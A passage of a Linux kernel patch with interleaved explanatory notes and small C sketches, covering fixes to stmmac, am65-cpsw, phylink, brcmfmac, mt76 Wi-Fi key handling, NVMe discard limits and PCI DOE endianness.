+ 	priv->plat->tx_queues_to_use = tx_cnt;
++	if (!netif_is_rxfh_configured(dev))
++		for (i = 0; i < ARRAY_SIZE(priv->rss.table); i++)
++			priv->rss.table[i] = ethtool_rxfh_indir_default(i,
++									rx_cnt);
+ 
+ 	stmmac_napi_add(dev);
+ 
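
The stmmac_reinit_queues() hunk refills the RSS indirection table whenever the user has not configured one, because entries pointing at queues >= the new rx_cnt would be stale. ethtool_rxfh_indir_default(i, n) is simply i % n, spreading slots round-robin over the new queue count; a sketch:

#include <stdio.h>

int main(void)
{
	unsigned int table[16], i, rx_cnt = 3;

	/* equivalent of table[i] = ethtool_rxfh_indir_default(i, rx_cnt) */
	for (i = 0; i < 16; i++)
		table[i] = i % rx_cnt;

	for (i = 0; i < 16; i++)
		printf("%u ", table[i]);	/* 0 1 2 0 1 2 ... */
	printf("\n");
	return 0;
}
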
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 8ff1c84a23ce7..25466cbdc16bd 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2819,7 +2819,8 @@ err_free_phylink:
+ 	am65_cpsw_nuss_phylink_cleanup(common);
+ 	am65_cpts_release(common->cpts);
+ err_of_clear:
+-	of_platform_device_destroy(common->mdio_dev, NULL);
++	if (common->mdio_dev)
++		of_platform_device_destroy(common->mdio_dev, NULL);
+ err_pm_clear:
+ 	pm_runtime_put_sync(dev);
+ 	pm_runtime_disable(dev);
+@@ -2848,7 +2849,8 @@ static int am65_cpsw_nuss_remove(struct platform_device *pdev)
+ 	am65_cpsw_nuss_phylink_cleanup(common);
+ 	am65_cpts_release(common->cpts);
+ 
+-	of_platform_device_destroy(common->mdio_dev, NULL);
++	if (common->mdio_dev)
++		of_platform_device_destroy(common->mdio_dev, NULL);
+ 
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index a202ce6611fde..4073e8243df3f 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -1552,6 +1552,25 @@ void phylink_destroy(struct phylink *pl)
+ }
+ EXPORT_SYMBOL_GPL(phylink_destroy);
+ 
++/**
++ * phylink_expects_phy() - Determine if phylink expects a phy to be attached
++ * @pl: a pointer to a &struct phylink returned from phylink_create()
++ *
++ * When using fixed-link mode, or in-band mode with 1000base-X or 2500base-X,
++ * no PHY is needed.
++ *
++ * Returns true if phylink will be expecting a PHY.
++ */
++bool phylink_expects_phy(struct phylink *pl)
++{
++	if (pl->cfg_link_an_mode == MLO_AN_FIXED ||
++	    (pl->cfg_link_an_mode == MLO_AN_INBAND &&
++	     phy_interface_mode_is_8023z(pl->link_config.interface)))
++		return false;
++	return true;
++}
++EXPORT_SYMBOL_GPL(phylink_expects_phy);
++
+ static void phylink_phy_change(struct phy_device *phydev, bool up)
+ {
+ 	struct phylink *pl = phydev->phylink;
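
phylink_expects_phy(), added above, lets MAC drivers skip PHY attach for fixed-link and for in-band 802.3z (1000base-X/2500base-X) links, which is exactly what the stmmac_init_phy() early return earlier in this patch relies on. A toy model of the predicate with stand-in enums (the kernel uses MLO_AN_* and phy_interface_t):

#include <stdbool.h>
#include <stdio.h>

enum an_mode { AN_PHY, AN_FIXED, AN_INBAND };
enum iface { IF_SGMII, IF_1000BASEX, IF_2500BASEX };

static bool is_8023z(enum iface i)
{
	return i == IF_1000BASEX || i == IF_2500BASEX;
}

static bool expects_phy(enum an_mode mode, enum iface i)
{
	if (mode == AN_FIXED || (mode == AN_INBAND && is_8023z(i)))
		return false;
	return true;
}

int main(void)
{
	printf("%d\n", expects_phy(AN_INBAND, IF_1000BASEX)); /* 0: no PHY */
	printf("%d\n", expects_phy(AN_PHY, IF_SGMII));        /* 1 */
	return 0;
}
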
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+index d0daef674e728..e300278ea38c6 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+@@ -991,15 +991,34 @@ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ MODULE_DEVICE_TABLE(sdio, brcmf_sdmmc_ids);
+ 
+ 
+-static void brcmf_sdiod_acpi_set_power_manageable(struct device *dev,
+-						  int val)
++static void brcmf_sdiod_acpi_save_power_manageable(struct brcmf_sdio_dev *sdiodev)
+ {
+ #if IS_ENABLED(CONFIG_ACPI)
+ 	struct acpi_device *adev;
+ 
+-	adev = ACPI_COMPANION(dev);
++	adev = ACPI_COMPANION(&sdiodev->func1->dev);
+ 	if (adev)
+-		adev->flags.power_manageable = 0;
++		sdiodev->func1_power_manageable = adev->flags.power_manageable;
++
++	adev = ACPI_COMPANION(&sdiodev->func2->dev);
++	if (adev)
++		sdiodev->func2_power_manageable = adev->flags.power_manageable;
++#endif
++}
++
++static void brcmf_sdiod_acpi_set_power_manageable(struct brcmf_sdio_dev *sdiodev,
++						  int enable)
++{
++#if IS_ENABLED(CONFIG_ACPI)
++	struct acpi_device *adev;
++
++	adev = ACPI_COMPANION(&sdiodev->func1->dev);
++	if (adev)
++		adev->flags.power_manageable = enable ? sdiodev->func1_power_manageable : 0;
++
++	adev = ACPI_COMPANION(&sdiodev->func2->dev);
++	if (adev)
++		adev->flags.power_manageable = enable ? sdiodev->func2_power_manageable : 0;
+ #endif
+ }
+ 
+@@ -1009,7 +1028,6 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	int err;
+ 	struct brcmf_sdio_dev *sdiodev;
+ 	struct brcmf_bus *bus_if;
+-	struct device *dev;
+ 
+ 	brcmf_dbg(SDIO, "Enter\n");
+ 	brcmf_dbg(SDIO, "Class=%x\n", func->class);
+@@ -1017,14 +1035,9 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	brcmf_dbg(SDIO, "sdio device ID: 0x%04x\n", func->device);
+ 	brcmf_dbg(SDIO, "Function#: %d\n", func->num);
+ 
+-	dev = &func->dev;
+-
+ 	/* Set MMC_QUIRK_LENIENT_FN0 for this card */
+ 	func->card->quirks |= MMC_QUIRK_LENIENT_FN0;
+ 
+-	/* prohibit ACPI power management for this device */
+-	brcmf_sdiod_acpi_set_power_manageable(dev, 0);
+-
+ 	/* Consume func num 1 but don't do anything with it. */
+ 	if (func->num == 1)
+ 		return 0;
+@@ -1055,6 +1068,7 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	dev_set_drvdata(&sdiodev->func1->dev, bus_if);
+ 	sdiodev->dev = &sdiodev->func1->dev;
+ 
++	brcmf_sdiod_acpi_save_power_manageable(sdiodev);
+ 	brcmf_sdiod_change_state(sdiodev, BRCMF_SDIOD_DOWN);
+ 
+ 	brcmf_dbg(SDIO, "F2 found, calling brcmf_sdiod_probe...\n");
+@@ -1120,6 +1134,8 @@ void brcmf_sdio_wowl_config(struct device *dev, bool enabled)
+ 
+ 	if (sdiodev->settings->bus.sdio.oob_irq_supported ||
+ 	    pm_caps & MMC_PM_WAKE_SDIO_IRQ) {
++		/* Stop ACPI from turning off the device when wowl is enabled */
++		brcmf_sdiod_acpi_set_power_manageable(sdiodev, !enabled);
+ 		sdiodev->wowl_enabled = enabled;
+ 		brcmf_dbg(SDIO, "Configuring WOWL, enabled=%d\n", enabled);
+ 		return;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
+index b76d34d36bde6..0d18ed15b4032 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
+@@ -188,6 +188,8 @@ struct brcmf_sdio_dev {
+ 	char nvram_name[BRCMF_FW_NAME_LEN];
+ 	char clm_name[BRCMF_FW_NAME_LEN];
+ 	bool wowl_enabled;
++	bool func1_power_manageable;
++	bool func2_power_manageable;
+ 	enum brcmf_sdiod_state state;
+ 	struct brcmf_sdiod_freezer *freezer;
+ 	const struct firmware *clm_fw;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/main.c b/drivers/net/wireless/mediatek/mt76/mt7603/main.c
+index ca50feb0b3a9d..1b1358c6bb464 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/main.c
+@@ -512,15 +512,15 @@ mt7603_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 	    !(key->flags & IEEE80211_KEY_FLAG_PAIRWISE))
+ 		return -EOPNOTSUPP;
+ 
+-	if (cmd == SET_KEY) {
+-		key->hw_key_idx = wcid->idx;
+-		wcid->hw_key_idx = idx;
+-	} else {
++	if (cmd != SET_KEY) {
+ 		if (idx == wcid->hw_key_idx)
+ 			wcid->hw_key_idx = -1;
+ 
+-		key = NULL;
++		return 0;
+ 	}
++
++	key->hw_key_idx = wcid->idx;
++	wcid->hw_key_idx = idx;
+ 	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 
+ 	return mt7603_wtbl_set_key(dev, wcid->idx, key);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index 2ce1705c0f433..a0412a29fb491 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -1180,8 +1180,7 @@ EXPORT_SYMBOL_GPL(mt7615_mac_set_rates);
+ static int
+ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 			   struct ieee80211_key_conf *key,
+-			   enum mt76_cipher_type cipher, u16 cipher_mask,
+-			   enum set_key_cmd cmd)
++			   enum mt76_cipher_type cipher, u16 cipher_mask)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx) + 30 * 4;
+ 	u8 data[32] = {};
+@@ -1190,27 +1189,18 @@ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 		return -EINVAL;
+ 
+ 	mt76_rr_copy(dev, addr, data, sizeof(data));
+-	if (cmd == SET_KEY) {
+-		if (cipher == MT_CIPHER_TKIP) {
+-			/* Rx/Tx MIC keys are swapped */
+-			memcpy(data, key->key, 16);
+-			memcpy(data + 16, key->key + 24, 8);
+-			memcpy(data + 24, key->key + 16, 8);
+-		} else {
+-			if (cipher_mask == BIT(cipher))
+-				memcpy(data, key->key, key->keylen);
+-			else if (cipher != MT_CIPHER_BIP_CMAC_128)
+-				memcpy(data, key->key, 16);
+-			if (cipher == MT_CIPHER_BIP_CMAC_128)
+-				memcpy(data + 16, key->key, 16);
+-		}
++	if (cipher == MT_CIPHER_TKIP) {
++		/* Rx/Tx MIC keys are swapped */
++		memcpy(data, key->key, 16);
++		memcpy(data + 16, key->key + 24, 8);
++		memcpy(data + 24, key->key + 16, 8);
+ 	} else {
++		if (cipher_mask == BIT(cipher))
++			memcpy(data, key->key, key->keylen);
++		else if (cipher != MT_CIPHER_BIP_CMAC_128)
++			memcpy(data, key->key, 16);
+ 		if (cipher == MT_CIPHER_BIP_CMAC_128)
+-			memset(data + 16, 0, 16);
+-		else if (cipher_mask)
+-			memset(data, 0, 16);
+-		if (!cipher_mask)
+-			memset(data, 0, sizeof(data));
++			memcpy(data + 16, key->key, 16);
+ 	}
+ 
+ 	mt76_wr_copy(dev, addr, data, sizeof(data));
+@@ -1221,7 +1211,7 @@ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ static int
+ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 			  enum mt76_cipher_type cipher, u16 cipher_mask,
+-			  int keyidx, enum set_key_cmd cmd)
++			  int keyidx)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx), w0, w1;
+ 
+@@ -1240,9 +1230,7 @@ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 	else
+ 		w0 &= ~MT_WTBL_W0_RX_IK_VALID;
+ 
+-	if (cmd == SET_KEY &&
+-	    (cipher != MT_CIPHER_BIP_CMAC_128 ||
+-	     cipher_mask == BIT(cipher))) {
++	if (cipher != MT_CIPHER_BIP_CMAC_128 || cipher_mask == BIT(cipher)) {
+ 		w0 &= ~MT_WTBL_W0_KEY_IDX;
+ 		w0 |= FIELD_PREP(MT_WTBL_W0_KEY_IDX, keyidx);
+ 	}
+@@ -1259,19 +1247,10 @@ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 
+ static void
+ mt7615_mac_wtbl_update_cipher(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+-			      enum mt76_cipher_type cipher, u16 cipher_mask,
+-			      enum set_key_cmd cmd)
++			      enum mt76_cipher_type cipher, u16 cipher_mask)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx);
+ 
+-	if (!cipher_mask) {
+-		mt76_clear(dev, addr + 2 * 4, MT_WTBL_W2_KEY_TYPE);
+-		return;
+-	}
+-
+-	if (cmd != SET_KEY)
+-		return;
+-
+ 	if (cipher == MT_CIPHER_BIP_CMAC_128 &&
+ 	    cipher_mask & ~BIT(MT_CIPHER_BIP_CMAC_128))
+ 		return;
+@@ -1282,8 +1261,7 @@ mt7615_mac_wtbl_update_cipher(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 
+ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			      struct mt76_wcid *wcid,
+-			      struct ieee80211_key_conf *key,
+-			      enum set_key_cmd cmd)
++			      struct ieee80211_key_conf *key)
+ {
+ 	enum mt76_cipher_type cipher;
+ 	u16 cipher_mask = wcid->cipher;
+@@ -1293,19 +1271,14 @@ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 	if (cipher == MT_CIPHER_NONE)
+ 		return -EOPNOTSUPP;
+ 
+-	if (cmd == SET_KEY)
+-		cipher_mask |= BIT(cipher);
+-	else
+-		cipher_mask &= ~BIT(cipher);
+-
+-	mt7615_mac_wtbl_update_cipher(dev, wcid, cipher, cipher_mask, cmd);
+-	err = mt7615_mac_wtbl_update_key(dev, wcid, key, cipher, cipher_mask,
+-					 cmd);
++	cipher_mask |= BIT(cipher);
++	mt7615_mac_wtbl_update_cipher(dev, wcid, cipher, cipher_mask);
++	err = mt7615_mac_wtbl_update_key(dev, wcid, key, cipher, cipher_mask);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	err = mt7615_mac_wtbl_update_pk(dev, wcid, cipher, cipher_mask,
+-					key->keyidx, cmd);
++					key->keyidx);
+ 	if (err < 0)
+ 		return err;
+ 
+@@ -1316,13 +1289,12 @@ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 
+ int mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			    struct mt76_wcid *wcid,
+-			    struct ieee80211_key_conf *key,
+-			    enum set_key_cmd cmd)
++			    struct ieee80211_key_conf *key)
+ {
+ 	int err;
+ 
+ 	spin_lock_bh(&dev->mt76.lock);
+-	err = __mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++	err = __mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 	spin_unlock_bh(&dev->mt76.lock);
+ 
+ 	return err;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/main.c b/drivers/net/wireless/mediatek/mt76/mt7615/main.c
+index 8d4733f87cda9..a3b0d4e9146a6 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/main.c
+@@ -391,18 +391,17 @@ static int mt7615_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 
+ 	if (cmd == SET_KEY)
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	if (mt76_is_mmio(&dev->mt76))
+-		err = mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++		err = mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 	else
+-		err = __mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++		err = __mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 
+ out:
+ 	mt7615_mutex_release(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h b/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
+index 060d52c81d9e9..c0e62082b62df 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
+@@ -482,11 +482,9 @@ int mt7615_mac_write_txwi(struct mt7615_dev *dev, __le32 *txwi,
+ void mt7615_mac_set_timing(struct mt7615_phy *phy);
+ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			      struct mt76_wcid *wcid,
+-			      struct ieee80211_key_conf *key,
+-			      enum set_key_cmd cmd);
++			      struct ieee80211_key_conf *key);
+ int mt7615_mac_wtbl_set_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+-			    struct ieee80211_key_conf *key,
+-			    enum set_key_cmd cmd);
++			    struct ieee80211_key_conf *key);
+ void mt7615_mac_reset_work(struct work_struct *work);
+ u32 mt7615_mac_get_sta_tid_sn(struct mt7615_dev *dev, int wcid, u8 tid);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_util.c b/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
+index 604ddcc211231..324535a0dd6d4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
+@@ -455,20 +455,20 @@ int mt76x02_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 	msta = sta ? (struct mt76x02_sta *)sta->drv_priv : NULL;
+ 	wcid = msta ? &msta->wcid : &mvif->group_wcid;
+ 
+-	if (cmd == SET_KEY) {
+-		key->hw_key_idx = wcid->idx;
+-		wcid->hw_key_idx = idx;
+-		if (key->flags & IEEE80211_KEY_FLAG_RX_MGMT) {
+-			key->flags |= IEEE80211_KEY_FLAG_SW_MGMT_TX;
+-			wcid->sw_iv = true;
+-		}
+-	} else {
++	if (cmd != SET_KEY) {
+ 		if (idx == wcid->hw_key_idx) {
+ 			wcid->hw_key_idx = -1;
+ 			wcid->sw_iv = false;
+ 		}
+ 
+-		key = NULL;
++		return 0;
++	}
++
++	key->hw_key_idx = wcid->idx;
++	wcid->hw_key_idx = idx;
++	if (key->flags & IEEE80211_KEY_FLAG_RX_MGMT) {
++		key->flags |= IEEE80211_KEY_FLAG_SW_MGMT_TX;
++		wcid->sw_iv = true;
+ 	}
+ 	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index 060cb88e82e30..bda26bd62412e 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -393,16 +393,15 @@ static int mt7915_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 		mt7915_mcu_add_bss_info(phy, vif, true);
+ 	}
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt76_connac_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				      key, MCU_EXT_CMD(STA_REC_UPDATE),
+ 				      &msta->wcid, cmd);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 111d9221b94f5..60fbbd1ac2f78 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -464,16 +464,15 @@ static int mt7921_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 
+ 	mt7921_mutex_acquire(dev);
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt76_connac_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				      key, MCU_UNI_CMD(STA_REC_UPDATE),
+ 				      &msta->wcid, cmd);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index a95e48b51da66..cb71ce3413c2d 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1711,6 +1711,9 @@ static void nvme_config_discard(struct gendisk *disk, struct nvme_ns *ns)
+ 	struct request_queue *queue = disk->queue;
+ 	u32 size = queue_logical_block_size(queue);
+ 
++	if (ctrl->dmrsl && ctrl->dmrsl <= nvme_sect_to_lba(ns, UINT_MAX))
++		ctrl->max_discard_sectors = nvme_lba_to_sect(ns, ctrl->dmrsl);
++
+ 	if (ctrl->max_discard_sectors == 0) {
+ 		blk_queue_max_discard_sectors(queue, 0);
+ 		return;
+@@ -1725,9 +1728,6 @@ static void nvme_config_discard(struct gendisk *disk, struct nvme_ns *ns)
+ 	if (queue->limits.max_discard_sectors)
+ 		return;
+ 
+-	if (ctrl->dmrsl && ctrl->dmrsl <= nvme_sect_to_lba(ns, UINT_MAX))
+-		ctrl->max_discard_sectors = nvme_lba_to_sect(ns, ctrl->dmrsl);
+-
+ 	blk_queue_max_discard_sectors(queue, ctrl->max_discard_sectors);
+ 	blk_queue_max_discard_segments(queue, ctrl->max_discard_segments);
+ 
+diff --git a/drivers/pci/doe.c b/drivers/pci/doe.c
+index 66d9ab2886468..e5e9b287b9766 100644
+--- a/drivers/pci/doe.c
++++ b/drivers/pci/doe.c
+@@ -128,7 +128,7 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 		return -EIO;
+ 
+ 	/* Length is 2 DW of header + length of payload in DW */
+-	length = 2 + task->request_pl_sz / sizeof(u32);
++	length = 2 + task->request_pl_sz / sizeof(__le32);
+ 	if (length > PCI_DOE_MAX_LENGTH)
+ 		return -EIO;
+ 	if (length == PCI_DOE_MAX_LENGTH)
+@@ -141,9 +141,9 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+ 			       FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_2_LENGTH,
+ 					  length));
+-	for (i = 0; i < task->request_pl_sz / sizeof(u32); i++)
++	for (i = 0; i < task->request_pl_sz / sizeof(__le32); i++)
+ 		pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+-				       task->request_pl[i]);
++				       le32_to_cpu(task->request_pl[i]));
+ 
+ 	pci_doe_write_ctrl(doe_mb, PCI_DOE_CTRL_GO);
+ 
+@@ -195,11 +195,11 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 
+ 	/* First 2 dwords have already been read */
+ 	length -= 2;
+-	payload_length = min(length, task->response_pl_sz / sizeof(u32));
++	payload_length = min(length, task->response_pl_sz / sizeof(__le32));
+ 	/* Read the rest of the response payload */
+ 	for (i = 0; i < payload_length; i++) {
+-		pci_read_config_dword(pdev, offset + PCI_DOE_READ,
+-				      &task->response_pl[i]);
++		pci_read_config_dword(pdev, offset + PCI_DOE_READ, &val);
++		task->response_pl[i] = cpu_to_le32(val);
+ 		/* Prior to the last ack, ensure Data Object Ready */
+ 		if (i == (payload_length - 1) && !pci_doe_data_obj_ready(doe_mb))
+ 			return -EIO;
+@@ -217,13 +217,14 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 	if (FIELD_GET(PCI_DOE_STATUS_ERROR, val))
+ 		return -EIO;
+ 
+-	return min(length, task->response_pl_sz / sizeof(u32)) * sizeof(u32);
++	return min(length, task->response_pl_sz / sizeof(__le32)) * sizeof(__le32);
+ }
+ 
+ static void signal_task_complete(struct pci_doe_task *task, int rv)
+ {
+ 	task->rv = rv;
+ 	task->complete(task);
++	destroy_work_on_stack(&task->work);
+ }
+ 
+ static void signal_task_abort(struct pci_doe_task *task, int rv)
+@@ -317,14 +318,16 @@ static int pci_doe_discovery(struct pci_doe_mb *doe_mb, u8 *index, u16 *vid,
+ {
+ 	u32 request_pl = FIELD_PREP(PCI_DOE_DATA_OBJECT_DISC_REQ_3_INDEX,
+ 				    *index);
++	__le32 request_pl_le = cpu_to_le32(request_pl);
++	__le32 response_pl_le;
+ 	u32 response_pl;
+ 	DECLARE_COMPLETION_ONSTACK(c);
+ 	struct pci_doe_task task = {
+ 		.prot.vid = PCI_VENDOR_ID_PCI_SIG,
+ 		.prot.type = PCI_DOE_PROTOCOL_DISCOVERY,
+-		.request_pl = &request_pl,
++		.request_pl = &request_pl_le,
+ 		.request_pl_sz = sizeof(request_pl),
+-		.response_pl = &response_pl,
++		.response_pl = &response_pl_le,
+ 		.response_pl_sz = sizeof(response_pl),
+ 		.complete = pci_doe_task_complete,
+ 		.private = &c,
+@@ -340,6 +343,7 @@ static int pci_doe_discovery(struct pci_doe_mb *doe_mb, u8 *index, u16 *vid,
+ 	if (task.rv != sizeof(response_pl))
+ 		return -EIO;
+ 
++	response_pl = le32_to_cpu(response_pl_le);
+ 	*vid = FIELD_GET(PCI_DOE_DATA_OBJECT_DISC_RSP_3_VID, response_pl);
+ 	*protocol = FIELD_GET(PCI_DOE_DATA_OBJECT_DISC_RSP_3_PROTOCOL,
+ 			      response_pl);
+@@ -520,6 +524,8 @@ EXPORT_SYMBOL_GPL(pci_doe_supports_prot);
+  * task->complete will be called when the state machine is done processing this
+  * task.
+  *
++ * @task must be allocated on the stack.
++ *
+  * Excess data will be discarded.
+  *
+  * RETURNS: 0 when task has been successfully queued, -ERRNO on error
+@@ -533,15 +539,15 @@ int pci_doe_submit_task(struct pci_doe_mb *doe_mb, struct pci_doe_task *task)
+ 	 * DOE requests must be a whole number of DW and the response needs to
+ 	 * be big enough for at least 1 DW
+ 	 */
+-	if (task->request_pl_sz % sizeof(u32) ||
+-	    task->response_pl_sz < sizeof(u32))
++	if (task->request_pl_sz % sizeof(__le32) ||
++	    task->response_pl_sz < sizeof(__le32))
+ 		return -EINVAL;
+ 
+ 	if (test_bit(PCI_DOE_FLAG_DEAD, &doe_mb->flags))
+ 		return -EIO;
+ 
+ 	task->doe_mb = doe_mb;
+-	INIT_WORK(&task->work, doe_statemachine_work);
++	INIT_WORK_ONSTACK(&task->work, doe_statemachine_work);
+ 	queue_work(doe_mb->work_queue, &task->work);
+ 	return 0;
+ }
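
The DOE change retypes payloads as __le32 and converts at the config-space boundary, so the mailbox also works on big-endian hosts. A userspace sketch of what cpu_to_le32() amounts to; the kernel of course uses the real byteorder helpers, not this hand-rolled probe:

#include <stdint.h>
#include <stdio.h>

/* Hand-rolled equivalent of cpu_to_le32() for illustration only. */
static uint32_t to_le32(uint32_t v)
{
	const union { uint16_t u16; uint8_t u8[2]; } probe = { .u16 = 1 };

	if (probe.u8[0])	/* little-endian host: identity */
		return v;
	return ((v & 0x000000ffu) << 24) | ((v & 0x0000ff00u) << 8) |
	       ((v & 0x00ff0000u) >> 8)  | ((v & 0xff000000u) >> 24);
}

int main(void)
{
	uint32_t payload = 0x12345678;

	/* the byte order a __le32 payload buffer holds on this host */
	printf("0x%08x\n", to_le32(payload));
	return 0;
}
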
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index 74af3e593b2ca..336b9029d1515 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -920,7 +920,7 @@ static ssize_t display_name_show(struct kobject *kobj, struct kobj_attribute *at
+ static ssize_t current_value_show(struct kobject *kobj, struct kobj_attribute *attr, char *buf)
+ {
+ 	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
+-	char *item, *value;
++	char *item, *value, *p;
+ 	int ret;
+ 
+ 	ret = tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID);
+@@ -930,10 +930,15 @@ static ssize_t current_value_show(struct kobject *kobj, struct kobj_attribute *a
+ 	/* validate and split from `item,value` -> `value` */
+ 	value = strpbrk(item, ",");
+ 	if (!value || value == item || !strlen(value + 1))
+-		return -EINVAL;
+-
